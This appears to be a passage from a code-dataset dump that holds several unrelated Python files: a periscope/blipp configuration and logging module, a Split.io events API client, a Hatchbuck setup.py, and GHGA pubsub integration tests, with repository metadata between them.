'paths': 'http://unis.crest.iu.edu/schema/20160630/path#',
'networks': 'http://unis.crest.iu.edu/schema/20160630/network#',
'topologies': 'http://unis.crest.iu.edu/schema/20160630/topology#',
'services': 'http://unis.crest.iu.edu/schema/20160630/service#',
'blipp': 'http://unis.crest.iu.edu/schema/20160630/blipp#',
'metadata': 'http://unis.crest.iu.edu/schema/20160630/metadata#',
'datum': 'http://unis.crest.iu.edu/schema/20160630/datum#',
'data': 'http://unis.crest.iu.edu/schema/20160630/data#',
'measurement': 'http://unis.crest.iu.edu/schema/20160630/measurement#',
}
MIME = {
'HTML': 'text/html',
'JSON': 'application/json',
'PLAIN': 'text/plain',
'SSE': 'text/event-stream',
'PSJSON': 'application/perfsonar+json',
'PSBSON': 'application/perfsonar+bson',
'PSXML': 'application/perfsonar+xml',
}
'''
Calculate URN deterministic way with a goal to make it as unique as
possible. We might still get into situation where urn might not be unique
if appropriate reverse dns entries are not set or duplicate MAC addresses
are used.
We construct urn as follows.
case 1) socket.getfqdn() resolves into monitor.incentre.iu.edu then
urn=urn:ogf:network:domain=incentre.iu.edu:node=monitor:
case 2) socket.getfqdn() fails then
urn=urn:ogf:network:domain=<FQDN>:node=<default_interface_ip>_<mac_address_of_default_interface>_<hostname>:
'''
HOSTNAME = socket.getfqdn() ### this might fail n give hostname
fqdn = socket.getfqdn()
hostname = socket.gethostname()
if not fqdn or not hostname:
raise Exception("socket.getfqdn or socket.gethostname failed.\
Try setting urn manually.")
#we check fqdn != hostname, if not then we have success
if fqdn != hostname:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
else:
try:
default_ip, default_iface = utils.get_default_gateway_linux()
default_ip = netifaces.ifaddresses(default_iface)[netifaces.AF_INET][0]["addr"]
default_mac = netifaces.ifaddresses(default_iface)[netifaces.AF_LINK][0]["addr"]
default_mac = utils.clean_mac(default_mac)
HOST_URN = "urn:ogf:network:domain=%s:node=%s_%s_%s" % \
(fqdn, default_ip, default_mac, hostname)
except Exception:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
NODE_INFO_FILE="/usr/local/etc/node.info"
STANDALONE_DEFAULTS = {
"$schema": SCHEMAS["services"],
"status": "ON",
"serviceType": "ps:tools:blipp",
"ttl": 600,
"properties": {
"configurations": {
"unis_url": "http://localhost:8888",
"unis_max_backoff": 3600,
"unis_poll_interval":300,
"use_ssl": "",
"ssl_cafile": "",
"probe_defaults": {
"collection_schedule": "builtins.simple",
"schedule_params": {"every": 2}, # run every 2 seconds
"collection_size": 10000000, # ~10 megabytes
"collection_ttl": 1500000, # ~17 days
"reporting_params": 1, # report every probe (no default aggregation)
"reporting_tolerance": 10 # store 10 on unreachable MS
},
"probes": {
}
}
}
}
nconf = {}
AUTH_UUID = None
UNIS_ID = None
MS_URL = None
GN_ADDR = None
try:
with open(NODE_INFO_FILE, 'r') as cfile:
for line in cfile:
name, var = line.partition("=")[::2]
nconf[name.strip()] = str(var).rstrip()
try:
MS_URL = nconf['ms_instance']
except Exception as e:
pass
try:
AUTH_UUID = nconf['auth_uuid']
except Exception as e:
pass
try:
UNIS_ID = nconf['unis_id']
except Exception as e:
pass
try:
GN_ADDR = nconf['gn_address']
except Exception as e:
pass
except IOError:
pass
if AUTH_UUID:
STANDALONE_DEFAULTS["properties"].update({"geni": {"slice_uuid":AUTH_UUID}})
if MS_URL:
STANDALONE_DEFAULTS["properties"]["configurations"]["probe_defaults"].update({"ms_url":MS_URL})
##################################################################
# Netlogger stuff... pasted from Ahmed's peri-tornado
##################################################################
import logging, logging.handlers
from netlogger import nllog
DEBUG = False
TRACE = False
CONSOLE = True
NETLOGGER_NAMESPACE = "blippd"
WORKSPACE = "."
def config_logger():
    """Configure the netlogger root logger: a plain-message console handler,
    an optional TCP socket handler to the global node (GN), and a level
    derived from the module-level TRACE/DEBUG/CONSOLE flags."""
    nllog.PROJECT_NAMESPACE = NETLOGGER_NAMESPACE
    #logging.setLoggerClass(nllog.PrettyBPLogger)
    logging.setLoggerClass(nllog.BPLogger)
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    handler = logging.StreamHandler()
    handler.setFormatter(logging.Formatter("%(message)s"))
    log.addHandler(handler)
    if GN_ADDR:
        # setup socket to global node, GN
        socketHandler = logging.handlers.SocketHandler(GN_ADDR,
               logging.handlers.DEFAULT_TCP_LOGGING_PORT)
        log.addHandler(socketHandler)
    # set level: each branch indexes a (WARN, INFO, DEBUG, <extra>) tuple
    if TRACE:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[3]
    elif DEBUG:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[2]
    elif CONSOLE:
        # 25 is a custom level sitting between INFO (20) and WARN (30)
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     25)[3]
    else:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[1]
    log.setLevel(log_level)
def add_filehandler(logfile):
    """Replace the logger's handlers with a rotating file handler.

    Defined here because `get_logger` below calls it; in this copy of the
    module it was otherwise undefined, making `get_logger(logfile=...)`
    raise NameError.

    :param logfile: path of the log file (rotated at ~500 kB, 5 backups)
    """
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    # drop the previously attached console/socket handlers so output goes
    # only to the file
    log.handlers = []
    try:
        fileHandler = logging.handlers.RotatingFileHandler(
            logfile, maxBytes=500000, backupCount=5)
        fileHandler.setFormatter(logging.Formatter("%(message)s"))
        log.addHandler(fileHandler)
    except (IOError, OSError, AttributeError) as exp:
        # opening the file raises IOError/OSError; keep the process alive
        # and report the failure instead
        log.error("Could not attach File Logger: {exp}".format(exp=exp))
def set_level(level):
    """Set the log level by name ('TRACE', 'DEBUG' or 'CONSOLE').

    Unknown names leave the level unchanged. Also required by `get_logger`
    below and missing from this copy of the module.
    """
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    level = level.upper()
    if level == 'TRACE':
        log_level = nllog.TRACE
    elif level == 'DEBUG':
        log_level = logging.DEBUG
    elif level == 'CONSOLE':
        # custom level between INFO (20) and WARN (30)
        log_level = 25
    else:
        return
    log.setLevel(log_level)
def get_logger(namespace=NETLOGGER_NAMESPACE, logfile=None, level=None):
    """Return a netlogger logger, lazily configuring netlogger on first use.

    :param namespace: logger namespace to fetch
    :param logfile: optional path; redirects output to a rotating file
    :param level: optional level name ('TRACE'/'DEBUG'/'CONSOLE')
    """
    # Test if netlogger is initialized (config_logger sets the namespace,
    # so this branch runs at most once)
    if nllog.PROJECT_NAMESPACE != NETLOGGER_NAMESPACE:
        config_logger()
    if logfile:
        add_filehandler(logfile)
    if level:
        set_level(level)
    return nllog.get_logger(namespace)
##################################################################
# Read in a configuration file
##################################################################
CONFIG_FILE="/etc/periscope/blippd.conf"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
main_config = ["unis_url", "ms_url", "data_file", "ssl_cert", "ssl_key",
"ssl_cafile", "unis_poll_interval", "use_ssl"]
probe_map = {"registration_probe": ["service_type", "service_name", "service_description",
"service_accesspoint", "pidfile", "process_name",
"service_ttl"],
"net": ["unis_url"],
"cpu": ["proc_dir"],
"mem": []}
for key in main_config:
try:
value = config.get("main", key)
STANDALONE_DEFAULTS["properties"]["configurations"].update({key: value})
except:
pass
for section in config.sections():
if section == "main":
continue
module = config.get(section, "module")
if module in probe_map.keys():
conf = dict()
conf.update({"probe_module": module})
# set the schedule interval if present (otherwise will get probe default)
try:
conf.update({"schedule_params": {"every": (int)(config.get(section, "interval"))}})
except:
pass
for key in probe_map[module]:
try:
value = config.get(section, key)
conf.update({key: value})
except:
pass
STANDALONE_DEFAULTS["properties"]["configurations"]["probes"].update({section: conf})
| 35.466912 | 110 | 0.597077 | # =============================================================================
# periscope-ps (blipp)
#
# Copyright (c) 2013-2016, Trustees of Indiana University,
# All rights reserved.
#
# This software may be modified and distributed under the terms of the BSD
# license. See the COPYING file for details.
#
# This software was created at the Indiana University Center for Research in
# Extreme Scale Technologies (CREST).
# =============================================================================
import ConfigParser
import socket
import netifaces
import utils
SCHEMAS = {
'networkresources': 'http://unis.crest.iu.edu/schema/20160630/networkresource#',
'nodes': 'http://unis.crest.iu.edu/schema/20160630/node#',
'domains': 'http://unis.crest.iu.edu/schema/20160630/domain#',
'ports': 'http://unis.crest.iu.edu/schema/20160630/port#',
'links': 'http://unis.crest.iu.edu/schema/20160630/link#',
'paths': 'http://unis.crest.iu.edu/schema/20160630/path#',
'networks': 'http://unis.crest.iu.edu/schema/20160630/network#',
'topologies': 'http://unis.crest.iu.edu/schema/20160630/topology#',
'services': 'http://unis.crest.iu.edu/schema/20160630/service#',
'blipp': 'http://unis.crest.iu.edu/schema/20160630/blipp#',
'metadata': 'http://unis.crest.iu.edu/schema/20160630/metadata#',
'datum': 'http://unis.crest.iu.edu/schema/20160630/datum#',
'data': 'http://unis.crest.iu.edu/schema/20160630/data#',
'measurement': 'http://unis.crest.iu.edu/schema/20160630/measurement#',
}
MIME = {
'HTML': 'text/html',
'JSON': 'application/json',
'PLAIN': 'text/plain',
'SSE': 'text/event-stream',
'PSJSON': 'application/perfsonar+json',
'PSBSON': 'application/perfsonar+bson',
'PSXML': 'application/perfsonar+xml',
}
'''
Calculate URN deterministic way with a goal to make it as unique as
possible. We might still get into situation where urn might not be unique
if appropriate reverse dns entries are not set or duplicate MAC addresses
are used.
We construct urn as follows.
case 1) socket.getfqdn() resolves into monitor.incentre.iu.edu then
urn=urn:ogf:network:domain=incentre.iu.edu:node=monitor:
case 2) socket.getfqdn() fails then
urn=urn:ogf:network:domain=<FQDN>:node=<default_interface_ip>_<mac_address_of_default_interface>_<hostname>:
'''
HOSTNAME = socket.getfqdn() ### this might fail n give hostname
fqdn = socket.getfqdn()
hostname = socket.gethostname()
if not fqdn or not hostname:
raise Exception("socket.getfqdn or socket.gethostname failed.\
Try setting urn manually.")
#we check fqdn != hostname, if not then we have success
if fqdn != hostname:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
else:
try:
default_ip, default_iface = utils.get_default_gateway_linux()
default_ip = netifaces.ifaddresses(default_iface)[netifaces.AF_INET][0]["addr"]
default_mac = netifaces.ifaddresses(default_iface)[netifaces.AF_LINK][0]["addr"]
default_mac = utils.clean_mac(default_mac)
HOST_URN = "urn:ogf:network:domain=%s:node=%s_%s_%s" % \
(fqdn, default_ip, default_mac, hostname)
except Exception:
domain = fqdn.replace(hostname+".", "")
HOST_URN = "urn:ogf:network:domain=%s:node=%s:" % (domain, hostname)
NODE_INFO_FILE="/usr/local/etc/node.info"
STANDALONE_DEFAULTS = {
"$schema": SCHEMAS["services"],
"status": "ON",
"serviceType": "ps:tools:blipp",
"ttl": 600,
"properties": {
"configurations": {
"unis_url": "http://localhost:8888",
"unis_max_backoff": 3600,
"unis_poll_interval":300,
"use_ssl": "",
"ssl_cafile": "",
"probe_defaults": {
"collection_schedule": "builtins.simple",
"schedule_params": {"every": 2}, # run every 2 seconds
"collection_size": 10000000, # ~10 megabytes
"collection_ttl": 1500000, # ~17 days
"reporting_params": 1, # report every probe (no default aggregation)
"reporting_tolerance": 10 # store 10 on unreachable MS
},
"probes": {
}
}
}
}
nconf = {}
AUTH_UUID = None
UNIS_ID = None
MS_URL = None
GN_ADDR = None
try:
with open(NODE_INFO_FILE, 'r') as cfile:
for line in cfile:
name, var = line.partition("=")[::2]
nconf[name.strip()] = str(var).rstrip()
try:
MS_URL = nconf['ms_instance']
except Exception as e:
pass
try:
AUTH_UUID = nconf['auth_uuid']
except Exception as e:
pass
try:
UNIS_ID = nconf['unis_id']
except Exception as e:
pass
try:
GN_ADDR = nconf['gn_address']
except Exception as e:
pass
except IOError:
pass
if AUTH_UUID:
STANDALONE_DEFAULTS["properties"].update({"geni": {"slice_uuid":AUTH_UUID}})
if MS_URL:
STANDALONE_DEFAULTS["properties"]["configurations"]["probe_defaults"].update({"ms_url":MS_URL})
##################################################################
# Netlogger stuff... pasted from Ahmed's peri-tornado
##################################################################
import logging, logging.handlers
from netlogger import nllog
DEBUG = False
TRACE = False
CONSOLE = True
NETLOGGER_NAMESPACE = "blippd"
WORKSPACE = "."
def config_logger():
    """Configure the netlogger root logger: a plain-message console handler,
    an optional TCP socket handler to the global node (GN), and a level
    derived from the module-level TRACE/DEBUG/CONSOLE flags."""
    nllog.PROJECT_NAMESPACE = NETLOGGER_NAMESPACE
    #logging.setLoggerClass(nllog.PrettyBPLogger)
    logging.setLoggerClass(nllog.BPLogger)
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    handler = logging.StreamHandler()
    handler.setFormatter(logging.Formatter("%(message)s"))
    log.addHandler(handler)
    if GN_ADDR:
        # setup socket to global node, GN
        socketHandler = logging.handlers.SocketHandler(GN_ADDR,
               logging.handlers.DEFAULT_TCP_LOGGING_PORT)
        log.addHandler(socketHandler)
    # set level: each branch indexes a (WARN, INFO, DEBUG, <extra>) tuple
    if TRACE:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[3]
    elif DEBUG:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[2]
    elif CONSOLE:
        # 25 is a custom level sitting between INFO (20) and WARN (30)
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     25)[3]
    else:
        log_level = (logging.WARN, logging.INFO, logging.DEBUG,
                     nllog.TRACE)[1]
    log.setLevel(log_level)
def add_filehandler(logfile):
    """Replace the logger's handlers with a rotating file handler.

    :param logfile: path of the log file (rotated at ~500 kB, 5 backups)
    """
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    # drop the previously attached console/socket handlers so output goes
    # only to the file
    log.handlers = []
    try:
        fileHandler = logging.handlers.RotatingFileHandler(logfile, maxBytes = 500000, backupCount = 5)
        fileHandler.setFormatter(logging.Formatter("%(message)s"))
        log.addHandler(fileHandler)
    except (IOError, OSError, AttributeError) as exp:
        # bug fix: RotatingFileHandler raises IOError/OSError when the file
        # cannot be opened; catching only AttributeError let the common
        # failure (bad path/permissions) crash instead of being logged
        log.error("Could not attach File Logger: {exp}".format(exp = exp))
def set_level(level):
    """Set the logger's level by name; unrecognized names are a no-op.

    Recognized (case-insensitive) names: 'TRACE', 'DEBUG', 'CONSOLE'.
    """
    log = logging.getLogger(nllog.PROJECT_NAMESPACE)
    name = level.upper()
    if name == 'TRACE':
        chosen = nllog.TRACE
    elif name == 'DEBUG':
        chosen = logging.DEBUG
    elif name == 'CONSOLE':
        # custom level between INFO (20) and WARN (30)
        chosen = 25
    else:
        # unknown level name: leave the current level untouched
        return
    log.setLevel(chosen)
def get_logger(namespace=NETLOGGER_NAMESPACE, logfile=None, level=None):
    """Return a netlogger logger, lazily configuring netlogger on first use.

    :param namespace: logger namespace to fetch
    :param logfile: optional path; redirects output to a rotating file
    :param level: optional level name ('TRACE'/'DEBUG'/'CONSOLE')
    """
    # Test if netlogger is initialized (config_logger sets the namespace,
    # so this branch runs at most once)
    if nllog.PROJECT_NAMESPACE != NETLOGGER_NAMESPACE:
        config_logger()
    if logfile:
        add_filehandler(logfile)
    if level:
        set_level(level)
    return nllog.get_logger(namespace)
##################################################################
# Read in a configuration file
##################################################################
CONFIG_FILE="/etc/periscope/blippd.conf"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
main_config = ["unis_url", "ms_url", "data_file", "ssl_cert", "ssl_key",
"ssl_cafile", "unis_poll_interval", "use_ssl"]
probe_map = {"registration_probe": ["service_type", "service_name", "service_description",
"service_accesspoint", "pidfile", "process_name",
"service_ttl"],
"net": ["unis_url"],
"cpu": ["proc_dir"],
"mem": []}
for key in main_config:
try:
value = config.get("main", key)
STANDALONE_DEFAULTS["properties"]["configurations"].update({key: value})
except:
pass
for section in config.sections():
if section == "main":
continue
module = config.get(section, "module")
if module in probe_map.keys():
conf = dict()
conf.update({"probe_module": module})
# set the schedule interval if present (otherwise will get probe default)
try:
conf.update({"schedule_params": {"every": (int)(config.get(section, "interval"))}})
except:
pass
for key in probe_map[module]:
try:
value = config.get(section, key)
conf.update({key: value})
except:
pass
STANDALONE_DEFAULTS["properties"]["configurations"]["probes"].update({section: conf})
| 932 | 0 | 50 |
b9f177e501e7c5bddcdd1967d9b11cff801d70cd | 2,480 | py | Python | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | splitio/api/events.py | nhausman1/python-client | b15f76977dc3178634ee8e007b53f613ddd2ac7c | [
"Apache-2.0"
] | null | null | null | """Events API module."""
import logging
from future.utils import raise_from
from splitio.api import APIException, headers_from_metadata
from splitio.api.client import HttpClientException
class EventsAPI(object):  # pylint: disable=too-few-public-methods
    """Client that pushes event bulks to the Split events backend."""
    def __init__(self, http_client, apikey, sdk_metadata):
        """
        Class constructor.
        :param http_client: HTTP client responsible for issuing calls to the backend.
        :type http_client: HttpClient
        :param apikey: User apikey token.
        :type apikey: string
        :param sdk_metadata: SDK version & machine name & IP.
        :type sdk_metadata: splitio.client.util.SdkMetadata
        """
        self._client = http_client
        self._apikey = apikey
        self._metadata = headers_from_metadata(sdk_metadata)
        self._logger = logging.getLogger(self.__class__.__name__)
    @staticmethod
    def _build_bulk(events):
        """
        Format events the way the events endpoint expects them.
        :param events: Events to be bundled.
        :type events: list(splitio.models.events.Event)
        :return: Formatted bulk.
        :rtype: list(dict)
        """
        formatted = []
        for event in events:
            formatted.append({
                'key': event.key,
                'trafficTypeName': event.traffic_type_name,
                'eventTypeId': event.event_type_id,
                'value': event.value,
                'timestamp': event.timestamp,
                'properties': event.properties,
            })
        return formatted
    def flush_events(self, events):
        """
        Send events to the backend.
        :param events: Events bulk
        :type events: list
        :raises APIException: on a non-2xx response or an HTTP client failure.
        """
        payload = self._build_bulk(events)
        try:
            response = self._client.post(
                'events',
                '/events/bulk',
                self._apikey,
                body=payload,
                extra_headers=self._metadata,
            )
            success = 200 <= response.status_code < 300
            if not success:
                raise APIException(response.body, response.status_code)
        except HttpClientException as exc:
            self._logger.error('Http client is throwing exceptions')
            self._logger.debug('Error: ', exc_info=True)
            # chain the original client error onto the API-level exception
            raise_from(APIException('Events not flushed properly.'), exc)
| 32.207792 | 84 | 0.593952 | """Events API module."""
import logging
from future.utils import raise_from
from splitio.api import APIException, headers_from_metadata
from splitio.api.client import HttpClientException
class EventsAPI(object):  # pylint: disable=too-few-public-methods
    """Class that uses an httpClient to communicate with the events API."""
    def __init__(self, http_client, apikey, sdk_metadata):
        """
        Class constructor.
        :param http_client: HTTP Client responsible for issuing calls to the backend.
        :type http_client: HttpClient
        :param apikey: User apikey token.
        :type apikey: string
        :param sdk_metadata: SDK version & machine name & IP.
        :type sdk_metadata: splitio.client.util.SdkMetadata
        """
        self._logger = logging.getLogger(self.__class__.__name__)
        self._client = http_client
        self._apikey = apikey
        self._metadata = headers_from_metadata(sdk_metadata)
    @staticmethod
    def _build_bulk(events):
        """
        Build event bulk as expected by the API.
        :param events: Events to be bundled.
        :type events: list(splitio.models.events.Event)
        :return: Formatted bulk.
        :rtype: list(dict)
        """
        return [
            {
                'key': event.key,
                'trafficTypeName': event.traffic_type_name,
                'eventTypeId': event.event_type_id,
                'value': event.value,
                'timestamp': event.timestamp,
                'properties': event.properties,
            }
            for event in events
        ]
    def flush_events(self, events):
        """
        Send events to the backend.
        :param events: Events bulk
        :type events: list
        :raises APIException: if the backend answers with a non-2xx status
            or the underlying HTTP client fails.
        """
        bulk = self._build_bulk(events)
        try:
            response = self._client.post(
                'events',
                '/events/bulk',
                self._apikey,
                body=bulk,
                extra_headers=self._metadata
            )
            if not 200 <= response.status_code < 300:
                raise APIException(response.body, response.status_code)
        except HttpClientException as exc:
            self._logger.error('Http client is throwing exceptions')
            self._logger.debug('Error: ', exc_info=True)
            # chain the client error onto the API-level exception
            raise_from(APIException('Events not flushed properly.'), exc)
| 0 | 0 | 0 |
646aac25839c24a2acd9f04a89f56df8ba58a243 | 340 | py | Python | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 1 | 2019-10-24T14:45:46.000Z | 2019-10-24T14:45:46.000Z | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 7 | 2017-02-16T19:35:50.000Z | 2020-01-30T14:05:13.000Z | setup.py | jakesen/pyhatchbuck | 1bbefe52f46f05709e8272dcdbdb636d7e13325e | [
"MIT"
] | 3 | 2018-03-26T07:58:55.000Z | 2019-12-12T19:32:34.000Z | from setuptools import setup
# Distribution metadata for the pyhatchbuck package (Hatchbuck API client).
setup(
    name='pyhatchbuck',
    version='0.4',
    description='Python library for Hatchbuck API',
    url='https://github.com/jakesen/pyhatchbuck',
    author='Jacob Senecal',
    author_email='jacob.senecal@gmail.com',
    license='MIT',
    packages=['hatchbuck',],
    install_requires=['requests',],  # runtime dependency: HTTP client
)
| 24.285714 | 51 | 0.673529 | from setuptools import setup
# Distribution metadata for the pyhatchbuck package (Hatchbuck API client).
setup(
    name='pyhatchbuck',
    version='0.4',
    description='Python library for Hatchbuck API',
    url='https://github.com/jakesen/pyhatchbuck',
    author='Jacob Senecal',
    author_email='jacob.senecal@gmail.com',
    license='MIT',
    packages=['hatchbuck',],
    install_requires=['requests',],  # runtime dependency: HTTP client
)
0b2fb33ea9fc52a75ecaa6f5939d979600bd1d27 | 3,910 | py | Python | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | null | null | null | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | 7 | 2021-11-11T12:28:43.000Z | 2022-01-19T18:00:56.000Z | tests/integration/test_pubsub.py | ghga-de/internal-file-registry-service | 99892159f5b70184db6609e8c9ce3deb33fd335b | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 - 2022 Universität Tübingen, DKFZ and EMBL
# for the German Human Genome-Phenome Archive (GHGA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the messaging API (pubsub)"""
from typing import Any, Callable, Dict
from ghga_message_schemas import schemas
from ghga_service_chassis_lib.utils import exec_with_timeout
from internal_file_registry_service.pubsub import (
subscribe_registration_request,
subscribe_stage_requests,
)
from ..fixtures import ( # noqa: F401
DEFAULT_CONFIG,
amqp_fixture,
get_config,
psql_fixture,
s3_fixture,
state,
)
def sub_and_pub_test_generic(
    upstream_topic_name: str,
    downstream_topic_name: str,
    upstream_message: Dict[str, Any],
    upstream_msg_schema: dict,
    downstream_msg_schema: dict,
    subscribe_func: Callable,
    psql_fixture,  # noqa: F811
    s3_fixture,  # noqa: F811
    amqp_fixture,  # noqa: F811
):
    """Generic function for testing functions that first subscribe and then publish.

    Publishes `upstream_message` on `upstream_topic_name`, runs
    `subscribe_func` exactly once (run_forever=False) and asserts that a
    message carrying the same file_id appears on `downstream_topic_name`.
    """
    config = get_config(
        sources=[psql_fixture.config, s3_fixture.config, amqp_fixture.config]
    )
    # initialize upstream and downstream test services that will publish or receive
    # messages to or from this service:
    upstream_publisher = amqp_fixture.get_test_publisher(
        topic_name=upstream_topic_name,
        message_schema=upstream_msg_schema,
    )
    downstream_subscriber = amqp_fixture.get_test_subscriber(
        topic_name=downstream_topic_name,
        message_schema=downstream_msg_schema,
    )
    # publish a stage request:
    upstream_publisher.publish(upstream_message)
    # process the stage request (timeout guards against a hanging consumer):
    exec_with_timeout(
        func=lambda: subscribe_func(config=config, run_forever=False),
        timeout_after=2,
    )
    # expect stage confirmation message:
    downstream_message = downstream_subscriber.subscribe(timeout_after=2)
    assert downstream_message["file_id"] == upstream_message["file_id"]
def test_subscribe_stage_requests(psql_fixture, s3_fixture, amqp_fixture):  # noqa: F811
    """Test `subscribe_stage_requests`: a non-staged-file request must be
    answered with a file-staged-for-download confirmation."""
    sub_and_pub_test_generic(
        upstream_topic_name=DEFAULT_CONFIG.topic_name_stage_request,
        downstream_topic_name=DEFAULT_CONFIG.topic_name_staged_to_outbox,
        upstream_message=state.FILES["no_grouping_label_in_message"].message,  # type: ignore
        upstream_msg_schema=schemas.SCHEMAS["non_staged_file_requested"],
        downstream_msg_schema=schemas.SCHEMAS["file_staged_for_download"],
        subscribe_func=subscribe_stage_requests,
        psql_fixture=psql_fixture,
        s3_fixture=s3_fixture,
        amqp_fixture=amqp_fixture,
    )
def test_subscribe_registration_request(
    psql_fixture, s3_fixture, amqp_fixture  # noqa: F811
):
    """Test `subscribe_registration_request`: an upload-received message must
    be answered with a file-internally-registered confirmation."""
    sub_and_pub_test_generic(
        upstream_topic_name=DEFAULT_CONFIG.topic_name_reg_request,
        downstream_topic_name=DEFAULT_CONFIG.topic_name_registered,
        upstream_message=state.FILES["in_inbox_only"].message,  # type: ignore
        upstream_msg_schema=schemas.SCHEMAS["file_upload_received"],
        downstream_msg_schema=schemas.SCHEMAS["file_internally_registered"],
        subscribe_func=subscribe_registration_request,
        psql_fixture=psql_fixture,
        s3_fixture=s3_fixture,
        amqp_fixture=amqp_fixture,
    )
| 34.60177 | 93 | 0.749361 | # Copyright 2021 - 2022 Universität Tübingen, DKFZ and EMBL
# for the German Human Genome-Phenome Archive (GHGA)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the messaging API (pubsub)"""
from typing import Any, Callable, Dict
from ghga_message_schemas import schemas
from ghga_service_chassis_lib.utils import exec_with_timeout
from internal_file_registry_service.pubsub import (
subscribe_registration_request,
subscribe_stage_requests,
)
from ..fixtures import ( # noqa: F401
DEFAULT_CONFIG,
amqp_fixture,
get_config,
psql_fixture,
s3_fixture,
state,
)
def sub_and_pub_test_generic(
    upstream_topic_name: str,
    downstream_topic_name: str,
    upstream_message: Dict[str, Any],
    upstream_msg_schema: dict,
    downstream_msg_schema: dict,
    subscribe_func: Callable,
    psql_fixture,  # noqa: F811
    s3_fixture,  # noqa: F811
    amqp_fixture,  # noqa: F811
):
    """Generic function for testing functions that first subscribe and then publish.

    Publishes `upstream_message` on `upstream_topic_name`, runs
    `subscribe_func` exactly once (run_forever=False) and asserts that a
    message carrying the same file_id appears on `downstream_topic_name`.
    """
    config = get_config(
        sources=[psql_fixture.config, s3_fixture.config, amqp_fixture.config]
    )
    # initialize upstream and downstream test services that will publish or receive
    # messages to or from this service:
    upstream_publisher = amqp_fixture.get_test_publisher(
        topic_name=upstream_topic_name,
        message_schema=upstream_msg_schema,
    )
    downstream_subscriber = amqp_fixture.get_test_subscriber(
        topic_name=downstream_topic_name,
        message_schema=downstream_msg_schema,
    )
    # publish a stage request:
    upstream_publisher.publish(upstream_message)
    # process the stage request (timeout guards against a hanging consumer):
    exec_with_timeout(
        func=lambda: subscribe_func(config=config, run_forever=False),
        timeout_after=2,
    )
    # expect stage confirmation message:
    downstream_message = downstream_subscriber.subscribe(timeout_after=2)
    assert downstream_message["file_id"] == upstream_message["file_id"]
def test_subscribe_stage_requests(psql_fixture, s3_fixture, amqp_fixture):  # noqa: F811
    """Test `subscribe_stage_requests`: a non-staged-file request must be
    answered with a file-staged-for-download confirmation."""
    sub_and_pub_test_generic(
        upstream_topic_name=DEFAULT_CONFIG.topic_name_stage_request,
        downstream_topic_name=DEFAULT_CONFIG.topic_name_staged_to_outbox,
        upstream_message=state.FILES["no_grouping_label_in_message"].message,  # type: ignore
        upstream_msg_schema=schemas.SCHEMAS["non_staged_file_requested"],
        downstream_msg_schema=schemas.SCHEMAS["file_staged_for_download"],
        subscribe_func=subscribe_stage_requests,
        psql_fixture=psql_fixture,
        s3_fixture=s3_fixture,
        amqp_fixture=amqp_fixture,
    )
def test_subscribe_registration_request(
    psql_fixture, s3_fixture, amqp_fixture  # noqa: F811
):
    """Test `subscribe_registration_request`: an upload-received message must
    be answered with a file-internally-registered confirmation."""
    sub_and_pub_test_generic(
        upstream_topic_name=DEFAULT_CONFIG.topic_name_reg_request,
        downstream_topic_name=DEFAULT_CONFIG.topic_name_registered,
        upstream_message=state.FILES["in_inbox_only"].message,  # type: ignore
        upstream_msg_schema=schemas.SCHEMAS["file_upload_received"],
        downstream_msg_schema=schemas.SCHEMAS["file_internally_registered"],
        subscribe_func=subscribe_registration_request,
        psql_fixture=psql_fixture,
        s3_fixture=s3_fixture,
        amqp_fixture=amqp_fixture,
    )
| 0 | 0 | 0 |
f37eb1e7c63115be41814766b49df794657c5220 | 814 | py | Python | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
"MIT"
] | null | null | null | Lesson_6/task_5.py | nvv11/algorithms_and_data_structures_in_python | b87f7f618077d1bbf6c71c19845b1eaf62c07240 | [
